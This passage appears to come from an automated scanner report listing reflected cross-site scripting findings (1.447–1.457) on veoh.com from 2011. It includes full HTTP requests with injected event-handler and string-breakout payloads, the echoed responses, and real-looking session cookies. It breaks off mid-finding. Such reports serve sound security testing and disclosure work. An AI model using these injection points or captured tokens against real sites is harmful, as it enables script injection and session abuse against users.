Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 74545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/animationba538"><img src=a onerror=alert(1)>0ced7d2746a/sort/most viewed" selected="selected">
...[SNIP]...

1.447. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d was submitted in the REST URL parameter 4. This input was echoed as cd065<img src=a onerror=alert(1)>a077cbaf92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/animationcd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 74501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_animationcd065<img src=a onerror=alert(1)>a077cbaf92d"}</textarea>
...[SNIP]...

1.448. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c7e'%3b1844de9a605 was submitted in the REST URL parameter 6. This input was echoed as 14c7e';1844de9a605 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/animation/watch/v20767083WdnCj7gW14c7e'%3b1844de9a605 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 93332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'aa49d30e823c344f940751878361a0f0',
'v20767083WdnCj7gW14c7e';1844de9a605'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.449. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1 was submitted in the REST URL parameter 4. This input was echoed as fcae8"><img src=a onerror=alert(1)>26d66e628b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/celebrity_and_showbizfcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=50
Content-Length: 77572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/celebrity_and_showbizfcae8"><img src=a onerror=alert(1)>26d66e628b1/sort/most viewed" selected="selected">
...[SNIP]...

1.450. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160 was submitted in the REST URL parameter 4. This input was echoed as fb1e3<img src=a onerror=alert(1)>01b1c12b160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/celebrity_and_showbizfb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 77528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_celebrity_and_showbizfb1e3<img src=a onerror=alert(1)>01b1c12b160"}</textarea>
...[SNIP]...

1.451. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e231'%3bf41ab2e3621 was submitted in the REST URL parameter 6. This input was echoed as 3e231';f41ab2e3621 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T3e231'%3bf41ab2e3621 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 99706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'0c90fe9c71e40fe15f4f32a57a50efef',
'v20767641DYmkkC9T3e231';f41ab2e3621'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.452. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d was submitted in the REST URL parameter 4. This input was echoed as aa06e"><img src=a onerror=alert(1)>7b8d668185d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/educational_and_howtoaa06e"><img%20src%3da%20onerror%3dalert(1)>7b8d668185d/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 78368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/educational_and_howtoaa06e"><img src=a onerror=alert(1)>7b8d668185d/sort/most viewed" selected="selected">
...[SNIP]...

1.453. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1 was submitted in the REST URL parameter 4. This input was echoed as 1b1b0<img src=a onerror=alert(1)>1aed6fadab1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/educational_and_howto1b1b0<img%20src%3da%20onerror%3dalert(1)>1aed6fadab1/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90
Content-Length: 78324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_educational_and_howto1b1b0<img src=a onerror=alert(1)>1aed6fadab1"}</textarea>
...[SNIP]...

1.454. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1c2d'%3b713d1af7ffd was submitted in the REST URL parameter 6. This input was echoed as b1c2d';713d1af7ffd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJb1c2d'%3b713d1af7ffd HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:55 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 99708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'9445fc2cfdb27ccafffb6e6be9397f4d',
'v20767155HXCcYkcJb1c2d';713d1af7ffd'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.455. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a was submitted in the REST URL parameter 4. This input was echoed as b3fcf<img src=a onerror=alert(1)>5a765c7587a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/entertainmentb3fcf<img%20src%3da%20onerror%3dalert(1)>5a765c7587a/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=100
Content-Length: 76165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_entertainmentb3fcf<img src=a onerror=alert(1)>5a765c7587a"}</textarea>
...[SNIP]...

1.456. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906 was submitted in the REST URL parameter 4. This input was echoed as b4e10"><img src=a onerror=alert(1)>e01df9f8906 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/entertainmentb4e10"><img%20src%3da%20onerror%3dalert(1)>e01df9f8906/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=75
Content-Length: 76209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/entertainmentb4e10"><img src=a onerror=alert(1)>e01df9f8906/sort/most viewed" selected="selected">
...[SNIP]...

1.457. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a9e'%3b18c90b1747d was submitted in the REST URL parameter 6. This input was echoed as 48a9e';18c90b1747d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

